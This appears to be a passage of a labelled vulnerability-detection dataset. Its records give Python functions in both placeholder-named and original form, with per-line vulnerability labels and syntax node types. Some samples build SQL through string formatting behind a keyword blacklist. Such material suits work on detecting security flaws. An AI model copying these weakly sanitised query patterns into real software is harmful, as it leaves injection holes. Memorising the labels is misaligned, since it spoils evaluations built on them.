lines
sequencelengths 1
444
| raw_lines
sequencelengths 1
444
| label
sequencelengths 1
444
| type
sequencelengths 1
444
|
---|---|---|---|
[
"def FUNC_2(VAR_2, VAR_3, VAR_4):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_14 = VAR_3[0]\n",
"VAR_15 = VAR_3[1:]\n",
"if len(VAR_15) == 0:\n",
"VAR_2[VAR_14] = VAR_4\n",
"if VAR_14 in VAR_2:\n",
"FUNC_2(VAR_2, VAR_15, VAR_4)\n",
"VAR_33 = {}\n",
"FUNC_2(VAR_33, VAR_15, VAR_4)\n",
"VAR_2[VAR_14] = VAR_33\n"
] | [
"def _override_cfg(container, yamlkeys, value):...\n",
"\"\"\"docstring\"\"\"\n",
"key = yamlkeys[0]\n",
"rest = yamlkeys[1:]\n",
"if len(rest) == 0:\n",
"container[key] = value\n",
"if key in container:\n",
"_override_cfg(container, rest, value)\n",
"subtree = {}\n",
"_override_cfg(subtree, rest, value)\n",
"container[key] = subtree\n"
] | [
0,
0,
0,
0,
0,
0,
0,
1,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Condition",
"Expr'",
"Assign'",
"Expr'",
"Assign'"
] |
[
"def FUNC_2(self):...\n",
"return \"\"\"Task: %s (ID %d)\nFile: %s\n\"\"\" % (self.task[1], self.task[0], repr\n (self.filenames)) + GenericRequest.specific_info(self)\n"
] | [
"def specific_info(self):...\n",
"return \"\"\"Task: %s (ID %d)\nFile: %s\n\"\"\" % (self.task[1], self.task[0], repr\n (self.filenames)) + GenericRequest.specific_info(self)\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"def FUNC_13(self, VAR_21):...\n",
"\"\"\"docstring\"\"\"\n",
"if VAR_21 == '/':\n",
"return True\n",
"VAR_58 = self.getfile(VAR_21)\n",
"VAR_58 = None\n",
"if VAR_58 is None or VAR_58 is False:\n",
"return False\n",
"if VAR_58[VAR_2] == VAR_12:\n",
"return True\n",
"return False\n"
] | [
"def isdir(self, path):...\n",
"\"\"\"docstring\"\"\"\n",
"if path == '/':\n",
"return True\n",
"dir = self.getfile(path)\n",
"dir = None\n",
"if dir is None or dir is False:\n",
"return False\n",
"if dir[A_TYPE] == T_DIR:\n",
"return True\n",
"return False\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Condition",
"Return'",
"Assign'",
"Assign'",
"Condition",
"Return'",
"Condition",
"Return'",
"Return'"
] |
[
"def FUNC_10(self, VAR_12):...\n",
"\"\"\"docstring\"\"\"\n",
"for t in ids_to_tasks(VAR_12).split(','):\n",
"VAR_29 = get_task_module(t)\n",
"if hasattr(VAR_29, 'add_cmdline_args'):\n",
"VAR_29.add_cmdline_args(self)\n"
] | [
"def add_task_args(self, task):...\n",
"\"\"\"docstring\"\"\"\n",
"for t in ids_to_tasks(task).split(','):\n",
"agent = get_task_module(t)\n",
"if hasattr(agent, 'add_cmdline_args'):\n",
"agent.add_cmdline_args(self)\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"For",
"Assign'",
"Condition",
"Expr'"
] |
[
"def FUNC_2(self):...\n",
"if not self.current_user:\n",
"self.render('../login.html')\n",
"self.redirect('/')\n",
"return\n"
] | [
"def get(self):...\n",
"if not self.current_user:\n",
"self.render('../login.html')\n",
"self.redirect('/')\n",
"return\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Expr'",
"Expr'",
"Return'"
] |
[
"def FUNC_7(VAR_2):...\n",
"VAR_14 = {}\n",
"VAR_14['last_name'] = VAR_2.META.get('Shibboleth-sn', '')\n",
"VAR_14['first_name'] = VAR_2.META.get('Shibboleth-givenName', '')\n",
"VAR_14['email'] = VAR_2.META.get('Shibboleth-mail', '')\n",
"return VAR_14\n"
] | [
"def get_shib_info_from_request(request):...\n",
"info = {}\n",
"info['last_name'] = request.META.get('Shibboleth-sn', '')\n",
"info['first_name'] = request.META.get('Shibboleth-givenName', '')\n",
"info['email'] = request.META.get('Shibboleth-mail', '')\n",
"return info\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Return'"
] |
[
"def FUNC_7(self, VAR_6):...\n",
"\"\"\"docstring\"\"\"\n",
"return \"'\" + MySQLdb.escape_string(VAR_6) + \"'\"\n"
] | [
"def sqlForNonNone(self, value):...\n",
"\"\"\"docstring\"\"\"\n",
"return \"'\" + MySQLdb.escape_string(value) + \"'\"\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Return'"
] |
[
"def FUNC_3(VAR_1, VAR_2, VAR_3='', VAR_4=None):...\n",
"\"\"\"docstring\"\"\"\n",
"return FUNC_4(VAR_1, VAR_2['access_token'], VAR_6='', VAR_3=token_type,\n VAR_4=extra_data)\n"
] | [
"def oauth2_token_setter(remote, resp, token_type='', extra_data=None):...\n",
"\"\"\"docstring\"\"\"\n",
"return token_setter(remote, resp['access_token'], secret='', token_type=\n token_type, extra_data=extra_data)\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Return'"
] |
[
"def FUNC_44(self):...\n",
"self.cursor.execute('create table t1(a int, b int, c int, d int)')\n",
"self.cursor.execute('insert into t1 values(1,2,3,4)')\n",
"VAR_24 = self.cursor.execute('select * from t1').fetchone()\n",
"VAR_20 = str(VAR_24)\n",
"self.assertEqual(VAR_20, '(1, 2, 3, 4)')\n",
"VAR_20 = str(VAR_24[:-1])\n",
"self.assertEqual(VAR_20, '(1, 2, 3)')\n",
"VAR_20 = str(VAR_24[:1])\n",
"self.assertEqual(VAR_20, '(1,)')\n"
] | [
"def test_row_repr(self):...\n",
"self.cursor.execute('create table t1(a int, b int, c int, d int)')\n",
"self.cursor.execute('insert into t1 values(1,2,3,4)')\n",
"row = self.cursor.execute('select * from t1').fetchone()\n",
"result = str(row)\n",
"self.assertEqual(result, '(1, 2, 3, 4)')\n",
"result = str(row[:-1])\n",
"self.assertEqual(result, '(1, 2, 3)')\n",
"result = str(row[:1])\n",
"self.assertEqual(result, '(1,)')\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Expr'",
"Assign'",
"Expr'"
] |
[
"@mock.patch('requests.post', FUNC_0)...\n",
"VAR_4 = '/api/apps'\n",
"VAR_5 = self.client.post(VAR_4)\n",
"self.assertEqual(VAR_5.status_code, 201)\n",
"VAR_6 = VAR_5.data['id']\n",
"VAR_4 = '/api/apps/{app_id}/containers'.format(**locals())\n",
"VAR_5 = self.client.get(VAR_4)\n",
"self.assertEqual(VAR_5.status_code, 200)\n",
"self.assertEqual(len(VAR_5.data['results']), 0)\n",
"VAR_4 = '/api/apps/{app_id}/builds'.format(**locals())\n",
"VAR_8 = {'image': 'autotest/example', 'sha': 'a' * 40, 'procfile': json.\n dumps({'web': 'node server.js', 'worker': 'node worker.js'})}\n",
"VAR_5 = self.client.post(VAR_4, json.dumps(VAR_8), content_type=\n 'application/json')\n",
"self.assertEqual(VAR_5.status_code, 201)\n",
"VAR_4 = '/api/apps/{app_id}/scale'.format(**locals())\n",
"VAR_8 = {'web': 1}\n",
"VAR_5 = self.client.post(VAR_4, json.dumps(VAR_8), content_type=\n 'application/json')\n",
"self.assertEqual(VAR_5.status_code, 204)\n",
"VAR_4 = '/api/apps/{app_id}/containers'.format(**locals())\n",
"VAR_5 = self.client.get(VAR_4)\n",
"self.assertEqual(VAR_5.status_code, 200)\n",
"self.assertEqual(len(VAR_5.data['results']), 1)\n",
"self.assertEqual(VAR_5.data['results'][0]['release'], 'v2')\n",
"VAR_4 = '/api/apps/{app_id}/builds'.format(**locals())\n",
"VAR_8 = {'image': 'autotest/example'}\n",
"VAR_5 = self.client.post(VAR_4, json.dumps(VAR_8), content_type=\n 'application/json')\n",
"self.assertEqual(VAR_5.status_code, 201)\n",
"self.assertEqual(VAR_5.data['image'], VAR_8['image'])\n",
"VAR_4 = '/api/apps/{app_id}/containers'.format(**locals())\n",
"VAR_5 = self.client.get(VAR_4)\n",
"self.assertEqual(VAR_5.status_code, 200)\n",
"self.assertEqual(len(VAR_5.data['results']), 1)\n",
"self.assertEqual(VAR_5.data['results'][0]['release'], 'v3')\n",
"VAR_4 = '/api/apps/{app_id}/config'.format(**locals())\n",
"VAR_8 = {'values': json.dumps({'KEY': 'value'})}\n",
"VAR_5 = self.client.post(VAR_4, json.dumps(VAR_8), content_type=\n 'application/json')\n",
"self.assertEqual(VAR_5.status_code, 201)\n",
"VAR_4 = '/api/apps/{app_id}/containers'.format(**locals())\n",
"VAR_5 = self.client.get(VAR_4)\n",
"self.assertEqual(VAR_5.status_code, 200)\n",
"self.assertEqual(len(VAR_5.data['results']), 1)\n",
"self.assertEqual(VAR_5.data['results'][0]['release'], 'v4')\n"
] | [
"@mock.patch('requests.post', mock_import_repository_task)...\n",
"url = '/api/apps'\n",
"response = self.client.post(url)\n",
"self.assertEqual(response.status_code, 201)\n",
"app_id = response.data['id']\n",
"url = '/api/apps/{app_id}/containers'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(len(response.data['results']), 0)\n",
"url = '/api/apps/{app_id}/builds'.format(**locals())\n",
"body = {'image': 'autotest/example', 'sha': 'a' * 40, 'procfile': json.\n dumps({'web': 'node server.js', 'worker': 'node worker.js'})}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"self.assertEqual(response.status_code, 201)\n",
"url = '/api/apps/{app_id}/scale'.format(**locals())\n",
"body = {'web': 1}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"self.assertEqual(response.status_code, 204)\n",
"url = '/api/apps/{app_id}/containers'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(len(response.data['results']), 1)\n",
"self.assertEqual(response.data['results'][0]['release'], 'v2')\n",
"url = '/api/apps/{app_id}/builds'.format(**locals())\n",
"body = {'image': 'autotest/example'}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"self.assertEqual(response.status_code, 201)\n",
"self.assertEqual(response.data['image'], body['image'])\n",
"url = '/api/apps/{app_id}/containers'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(len(response.data['results']), 1)\n",
"self.assertEqual(response.data['results'][0]['release'], 'v3')\n",
"url = '/api/apps/{app_id}/config'.format(**locals())\n",
"body = {'values': json.dumps({'KEY': 'value'})}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"self.assertEqual(response.status_code, 201)\n",
"url = '/api/apps/{app_id}/containers'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(len(response.data['results']), 1)\n",
"self.assertEqual(response.data['results'][0]['release'], 'v4')\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Condition",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Expr'"
] |
[
"def FUNC_0(VAR_0, VAR_1):...\n",
"VAR_12 = ''\n",
"VAR_40 = VAR_41 = None\n",
"if VAR_1.sort_field and ',' in VAR_1.sort_field:\n",
"VAR_12 = ', '.join(['`tab{0}`.`{1}` {2}'.format(VAR_0, VAR_34.split()[0].\n strip(), VAR_34.split()[1].strip()) for VAR_34 in VAR_1.sort_field.\n split(',')])\n",
"VAR_40 = VAR_1.sort_field or 'modified'\n",
"if VAR_1.is_submittable:\n",
"VAR_41 = VAR_1.sort_field and VAR_1.sort_order or 'desc'\n",
"VAR_12 = '`tab{0}`.docstatus asc, {1}'.format(VAR_0, VAR_12)\n",
"return VAR_12\n",
"VAR_12 = '`tab{0}`.`{1}` {2}'.format(VAR_0, VAR_40 or 'modified', VAR_41 or\n 'desc')\n"
] | [
"def get_order_by(doctype, meta):...\n",
"order_by = ''\n",
"sort_field = sort_order = None\n",
"if meta.sort_field and ',' in meta.sort_field:\n",
"order_by = ', '.join(['`tab{0}`.`{1}` {2}'.format(doctype, f.split()[0].\n strip(), f.split()[1].strip()) for f in meta.sort_field.split(',')])\n",
"sort_field = meta.sort_field or 'modified'\n",
"if meta.is_submittable:\n",
"sort_order = meta.sort_field and meta.sort_order or 'desc'\n",
"order_by = '`tab{0}`.docstatus asc, {1}'.format(doctype, order_by)\n",
"return order_by\n",
"order_by = '`tab{0}`.`{1}` {2}'.format(doctype, sort_field or 'modified', \n sort_order or 'desc')\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Return'",
"Assign'"
] |
[
"def FUNC_3(self, VAR_4):...\n",
"\"\"\"docstring\"\"\"\n",
"if VAR_4 is None or VAR_4 == '':\n",
"return {} if not self.null else None\n",
"while isinstance(VAR_4, str):\n",
"if isinstance(VAR_4, dict):\n",
"VAR_4 = json_decode(VAR_4)\n",
"return CLASS_2(**value)\n",
"if isinstance(VAR_4, str):\n",
"return CLASS_3(VAR_4)\n",
"if isinstance(VAR_4, list):\n",
"return CLASS_4(VAR_4)\n",
"return VAR_4\n"
] | [
"def to_python(self, value):...\n",
"\"\"\"docstring\"\"\"\n",
"if value is None or value == '':\n",
"return {} if not self.null else None\n",
"while isinstance(value, str):\n",
"if isinstance(value, dict):\n",
"value = json_decode(value)\n",
"return JsonDict(**value)\n",
"if isinstance(value, str):\n",
"return JsonString(value)\n",
"if isinstance(value, list):\n",
"return JsonList(value)\n",
"return value\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Condition",
"Return'",
"Condition",
"Condition",
"Assign'",
"Return'",
"Condition",
"Return'",
"Condition",
"Return'",
"Return'"
] |
[
"def __len__(self):...\n",
"return len(self.nodes)\n"
] | [
"def __len__(self):...\n",
"return len(self.nodes)\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"@VAR_0.filter...\n",
"return reverse('model-remove', VAR_5=_normal_kwargs(model_object.\n course_instance, model_name, id=model_object.id))\n"
] | [
"@register.filter...\n",
"return reverse('model-remove', kwargs=_normal_kwargs(model_object.\n course_instance, model_name, id=model_object.id))\n"
] | [
0,
0
] | [
"Condition",
"Return'"
] |
[
"def FUNC_20(self, VAR_10=None, VAR_11=None, VAR_1=None):...\n",
"VAR_10 = self.add_rule(VAR_10, VAR_11, VAR_1)\n",
"VAR_13 = self.get_rule(VAR_10)\n",
"def FUNC_39(VAR_101):...\n",
"if VAR_101.input:\n",
"VAR_13.set_input(*VAR_101.input[0], **ruleinfo.input[1])\n",
"if VAR_101.output:\n",
"VAR_13.set_output(*VAR_101.output[0], **ruleinfo.output[1])\n",
"if VAR_101.params:\n",
"VAR_13.set_params(*VAR_101.params[0], **ruleinfo.params[1])\n",
"if VAR_101.threads:\n",
"if not isinstance(VAR_101.threads, int):\n",
"if VAR_101.resources:\n",
"VAR_13.resources['_cores'] = VAR_101.threads\n",
"VAR_76, VAR_52 = VAR_101.resources\n",
"if VAR_101.priority:\n",
"if VAR_76:\n",
"if not isinstance(VAR_101.priority, int) and not isinstance(VAR_101.\n",
"if VAR_101.version:\n",
"if not all(map(lambda r: isinstance(r, int), VAR_52.values())):\n",
"VAR_13.priority = VAR_101.priority\n",
"VAR_13.version = VAR_101.version\n",
"if VAR_101.log:\n",
"VAR_13.resources.update(VAR_52)\n",
"VAR_13.set_log(*VAR_101.log[0], **ruleinfo.log[1])\n",
"if VAR_101.message:\n",
"VAR_13.message = VAR_101.message\n",
"if VAR_101.benchmark:\n",
"VAR_13.benchmark = VAR_101.benchmark\n",
"VAR_13.norun = VAR_101.norun\n",
"VAR_13.docstring = VAR_101.docstring\n",
"VAR_13.run_func = VAR_101.func\n",
"VAR_13.shellcmd = VAR_101.shellcmd\n",
"VAR_101.func.__name__ = '__{}'.format(VAR_10)\n",
"self.globals[VAR_101.func.__name__] = VAR_101.func\n",
"setattr(VAR_86, VAR_10, VAR_13)\n",
"return VAR_101.func\n"
] | [
"def rule(self, name=None, lineno=None, snakefile=None):...\n",
"name = self.add_rule(name, lineno, snakefile)\n",
"rule = self.get_rule(name)\n",
"def decorate(ruleinfo):...\n",
"if ruleinfo.input:\n",
"rule.set_input(*ruleinfo.input[0], **ruleinfo.input[1])\n",
"if ruleinfo.output:\n",
"rule.set_output(*ruleinfo.output[0], **ruleinfo.output[1])\n",
"if ruleinfo.params:\n",
"rule.set_params(*ruleinfo.params[0], **ruleinfo.params[1])\n",
"if ruleinfo.threads:\n",
"if not isinstance(ruleinfo.threads, int):\n",
"if ruleinfo.resources:\n",
"rule.resources['_cores'] = ruleinfo.threads\n",
"args, resources = ruleinfo.resources\n",
"if ruleinfo.priority:\n",
"if args:\n",
"if not isinstance(ruleinfo.priority, int) and not isinstance(ruleinfo.\n",
"if ruleinfo.version:\n",
"if not all(map(lambda r: isinstance(r, int), resources.values())):\n",
"rule.priority = ruleinfo.priority\n",
"rule.version = ruleinfo.version\n",
"if ruleinfo.log:\n",
"rule.resources.update(resources)\n",
"rule.set_log(*ruleinfo.log[0], **ruleinfo.log[1])\n",
"if ruleinfo.message:\n",
"rule.message = ruleinfo.message\n",
"if ruleinfo.benchmark:\n",
"rule.benchmark = ruleinfo.benchmark\n",
"rule.norun = ruleinfo.norun\n",
"rule.docstring = ruleinfo.docstring\n",
"rule.run_func = ruleinfo.func\n",
"rule.shellcmd = ruleinfo.shellcmd\n",
"ruleinfo.func.__name__ = '__{}'.format(name)\n",
"self.globals[ruleinfo.func.__name__] = ruleinfo.func\n",
"setattr(rules, name, rule)\n",
"return ruleinfo.func\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"FunctionDef'",
"Condition",
"Expr'",
"Condition",
"Expr'",
"Condition",
"Expr'",
"Condition",
"Condition",
"Condition",
"Assign'",
"Assign'",
"Condition",
"Condition",
"Condition",
"Condition",
"Condition",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Expr'",
"Condition",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Docstring",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Return'"
] |
[
"def FUNC_9(self):...\n",
"self.test_strings = ('normal_string', 'string with spaces',\n 'string with quotes\"a', \"string with s-quotes'b\", 'bsn \\n A',\n 'unrecognized \\\\q escape')\n"
] | [
"def setUp(self):...\n",
"self.test_strings = ('normal_string', 'string with spaces',\n 'string with quotes\"a', \"string with s-quotes'b\", 'bsn \\n A',\n 'unrecognized \\\\q escape')\n"
] | [
0,
0
] | [
"FunctionDef'",
"Assign'"
] |
[
"def FUNC_0(self, VAR_0):...\n",
"return VAR_0.id\n"
] | [
"def to_representation(self, obj):...\n",
"return obj.id\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"import sys\n",
"from os import system\n",
"import psycopg2\n",
"import urllib.parse\n",
"import os\n",
"def FUNC_0():...\n",
"if 'DATABASE_URL' in os.environ and os.environ['DATABASE_URL']:\n",
"urllib.parse.uses_netloc.append('postgres')\n",
"VAR_12 = psycopg2.connect(database='expenses')\n",
"VAR_18 = urllib.parse.urlparse(os.environ['DATABASE_URL'])\n",
"return VAR_12\n",
"VAR_12 = psycopg2.connect(database=url.path[1:], user=url.username,\n password=url.password, host=url.hostname, port=url.port)\n",
"return VAR_12\n"
] | [
"import sys\n",
"from os import system\n",
"import psycopg2\n",
"import urllib.parse\n",
"import os\n",
"def check_heroku_db():...\n",
"if 'DATABASE_URL' in os.environ and os.environ['DATABASE_URL']:\n",
"urllib.parse.uses_netloc.append('postgres')\n",
"conn = psycopg2.connect(database='expenses')\n",
"url = urllib.parse.urlparse(os.environ['DATABASE_URL'])\n",
"return conn\n",
"conn = psycopg2.connect(database=url.path[1:], user=url.username, password=\n url.password, host=url.hostname, port=url.port)\n",
"return conn\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Import'",
"ImportFrom'",
"Import'",
"Import'",
"Import'",
"FunctionDef'",
"Condition",
"Expr'",
"Assign'",
"Assign'",
"Return'",
"Assign'",
"Return'"
] |
[
"def FUNC_2(VAR_1: HttpRequest):...\n",
""
] | [
"def action_add_single_media(request: HttpRequest):...\n",
""
] | [
0,
0
] | [
"FunctionDef'",
"Condition"
] |
[
"from __future__ import unicode_literals\n",
"import frappe, json\n",
"from frappe.utils import cstr, unique\n",
"from frappe import _\n",
"from six import string_types\n",
"def FUNC_0(VAR_0):...\n",
"VAR_12 = ['select', 'delete', 'drop', 'update', 'case', 'and', 'or', 'like']\n",
"def FUNC_6():...\n",
"VAR_13.throw(_('Invalid Search Field'), VAR_13.DataError)\n",
"if len(VAR_0) >= 3:\n",
"if '=' in VAR_0:\n",
"@VAR_13.whitelist()...\n",
"FUNC_6()\n",
"if ' --' in VAR_0:\n",
"FUNC_2(VAR_1, VAR_2, VAR_3, VAR_0=searchfield, VAR_5=page_length, VAR_4=filters\n )\n",
"FUNC_6()\n",
"if any(' {0} '.format(keyword) in VAR_0.split() for keyword in VAR_12):\n",
"VAR_13.response['results'] = FUNC_4(VAR_13.response['values'])\n",
"FUNC_6()\n",
"if any(keyword in VAR_0.split() for keyword in VAR_12):\n",
"@VAR_13.whitelist()...\n",
"FUNC_6()\n",
"if isinstance(VAR_4, string_types):\n",
"VAR_4 = json.loads(VAR_4)\n",
"VAR_9 = VAR_13.get_meta(VAR_1)\n",
"if VAR_0:\n",
"FUNC_0(VAR_0)\n",
"if not VAR_0:\n",
"VAR_0 = 'name'\n",
"VAR_14 = VAR_13.get_hooks().standard_queries or {}\n",
"if VAR_3 and VAR_3.split()[0].lower() != 'select':\n",
"VAR_13.response['values'] = VAR_13.call(VAR_3, VAR_1, VAR_2, VAR_0, VAR_6,\n VAR_5, VAR_4, VAR_8=as_dict)\n",
"if not VAR_3 and VAR_1 in VAR_14:\n",
"def FUNC_3(VAR_9, VAR_10):...\n",
"FUNC_2(VAR_1, VAR_2, VAR_14[VAR_1][0], VAR_0, VAR_6, VAR_5, VAR_4)\n",
"if VAR_3:\n",
"VAR_15 = VAR_9.search_fields and VAR_9.search_fields.split(',') or []\n",
"VAR_13.throw(_('This query style is discontinued'))\n",
"if isinstance(VAR_4, dict):\n",
"VAR_16 = [VAR_9.title_field\n ] if VAR_9.title_field and VAR_9.title_field not in VAR_15 else []\n",
"VAR_25 = VAR_4.items()\n",
"if VAR_4 == None:\n",
"VAR_15 = ['name'] + VAR_15 + VAR_16\n",
"VAR_4 = []\n",
"VAR_4 = []\n",
"VAR_19 = []\n",
"if not VAR_10 in VAR_15:\n",
"for f in VAR_25:\n",
"if VAR_2:\n",
"VAR_15 = VAR_15 + [VAR_10]\n",
"return VAR_15\n",
"if isinstance(f[1], (list, tuple)):\n",
"VAR_26 = ['name']\n",
"if VAR_9.get('fields', {'fieldname': 'enabled', 'fieldtype': 'Check'}):\n",
"VAR_4.append([VAR_1, f[0], f[1][0], f[1][1]])\n",
"VAR_4.append([VAR_1, f[0], '=', f[1]])\n",
"if VAR_9.title_field:\n",
"VAR_4.append([VAR_1, 'enabled', '=', 1])\n",
"if VAR_9.get('fields', {'fieldname': 'disabled', 'fieldtype': 'Check'}):\n",
"VAR_26.append(VAR_9.title_field)\n",
"if VAR_9.search_fields:\n",
"VAR_4.append([VAR_1, 'disabled', '!=', 1])\n",
"VAR_20 = FUNC_3(VAR_9, VAR_0 or 'name')\n",
"VAR_26.extend(VAR_9.get_search_fields())\n",
"for f in VAR_26:\n",
"if VAR_7:\n",
"VAR_27 = VAR_9.get_field(f.strip())\n",
"VAR_20 = list(set(VAR_20 + json.loads(VAR_7)))\n",
"VAR_21 = [('`tab%s`.`%s`' % (VAR_9.name, f.strip())) for f in VAR_20]\n",
"if f == 'name' or VAR_27 and VAR_27.fieldtype in ['Data', 'Text',\n",
"VAR_21.append('locate(\"{_txt}\", `tab{doctype}`.`name`) as `_relevance`'.\n format(_txt=frappe.db.escape((txt or '').replace('%', '')), VAR_1=\n frappe.db.escape(doctype)))\n",
"VAR_19.append([VAR_1, f.strip(), 'like', '%{0}%'.format(VAR_2)])\n",
"from frappe.model.db_query import get_order_by\n",
"VAR_22 = get_order_by(VAR_1, VAR_9)\n",
"VAR_23 = 'if(_relevance, _relevance, 99999), `tab{0}`.idx desc, {1}'.format(\n VAR_1, VAR_22)\n",
"VAR_24 = VAR_13.get_list(VAR_1, VAR_4=filters, VAR_20=formatted_fields,\n VAR_19=or_filters, limit_start=start, limit_page_length=page_length,\n VAR_23=order_by, ignore_permissions=True if doctype == 'DocType' else \n False, as_list=not as_dict)\n",
"if VAR_8:\n",
"for r in VAR_24:\n",
"VAR_13.response['values'] = [r[:-1] for r in VAR_24]\n",
"r.pop('_relevance')\n",
"VAR_13.response['values'] = VAR_24\n"
] | [
"from __future__ import unicode_literals\n",
"import frappe, json\n",
"from frappe.utils import cstr, unique\n",
"from frappe import _\n",
"from six import string_types\n",
"def sanitize_searchfield(searchfield):...\n",
"blacklisted_keywords = ['select', 'delete', 'drop', 'update', 'case', 'and',\n 'or', 'like']\n",
"def _raise_exception():...\n",
"frappe.throw(_('Invalid Search Field'), frappe.DataError)\n",
"if len(searchfield) >= 3:\n",
"if '=' in searchfield:\n",
"@frappe.whitelist()...\n",
"_raise_exception()\n",
"if ' --' in searchfield:\n",
"search_widget(doctype, txt, query, searchfield=searchfield, page_length=\n page_length, filters=filters)\n",
"_raise_exception()\n",
"if any(' {0} '.format(keyword) in searchfield.split() for keyword in\n",
"frappe.response['results'] = build_for_autosuggest(frappe.response['values'])\n",
"_raise_exception()\n",
"if any(keyword in searchfield.split() for keyword in blacklisted_keywords):\n",
"@frappe.whitelist()...\n",
"_raise_exception()\n",
"if isinstance(filters, string_types):\n",
"filters = json.loads(filters)\n",
"meta = frappe.get_meta(doctype)\n",
"if searchfield:\n",
"sanitize_searchfield(searchfield)\n",
"if not searchfield:\n",
"searchfield = 'name'\n",
"standard_queries = frappe.get_hooks().standard_queries or {}\n",
"if query and query.split()[0].lower() != 'select':\n",
"frappe.response['values'] = frappe.call(query, doctype, txt, searchfield,\n start, page_length, filters, as_dict=as_dict)\n",
"if not query and doctype in standard_queries:\n",
"def get_std_fields_list(meta, key):...\n",
"search_widget(doctype, txt, standard_queries[doctype][0], searchfield,\n start, page_length, filters)\n",
"if query:\n",
"sflist = meta.search_fields and meta.search_fields.split(',') or []\n",
"frappe.throw(_('This query style is discontinued'))\n",
"if isinstance(filters, dict):\n",
"title_field = [meta.title_field\n ] if meta.title_field and meta.title_field not in sflist else []\n",
"filters_items = filters.items()\n",
"if filters == None:\n",
"sflist = ['name'] + sflist + title_field\n",
"filters = []\n",
"filters = []\n",
"or_filters = []\n",
"if not key in sflist:\n",
"for f in filters_items:\n",
"if txt:\n",
"sflist = sflist + [key]\n",
"return sflist\n",
"if isinstance(f[1], (list, tuple)):\n",
"search_fields = ['name']\n",
"if meta.get('fields', {'fieldname': 'enabled', 'fieldtype': 'Check'}):\n",
"filters.append([doctype, f[0], f[1][0], f[1][1]])\n",
"filters.append([doctype, f[0], '=', f[1]])\n",
"if meta.title_field:\n",
"filters.append([doctype, 'enabled', '=', 1])\n",
"if meta.get('fields', {'fieldname': 'disabled', 'fieldtype': 'Check'}):\n",
"search_fields.append(meta.title_field)\n",
"if meta.search_fields:\n",
"filters.append([doctype, 'disabled', '!=', 1])\n",
"fields = get_std_fields_list(meta, searchfield or 'name')\n",
"search_fields.extend(meta.get_search_fields())\n",
"for f in search_fields:\n",
"if filter_fields:\n",
"fmeta = meta.get_field(f.strip())\n",
"fields = list(set(fields + json.loads(filter_fields)))\n",
"formatted_fields = [('`tab%s`.`%s`' % (meta.name, f.strip())) for f in fields]\n",
"if f == 'name' or fmeta and fmeta.fieldtype in ['Data', 'Text',\n",
"formatted_fields.append(\n 'locate(\"{_txt}\", `tab{doctype}`.`name`) as `_relevance`'.format(_txt=\n frappe.db.escape((txt or '').replace('%', '')), doctype=frappe.db.\n escape(doctype)))\n",
"or_filters.append([doctype, f.strip(), 'like', '%{0}%'.format(txt)])\n",
"from frappe.model.db_query import get_order_by\n",
"order_by_based_on_meta = get_order_by(doctype, meta)\n",
"order_by = 'if(_relevance, _relevance, 99999), `tab{0}`.idx desc, {1}'.format(\n doctype, order_by_based_on_meta)\n",
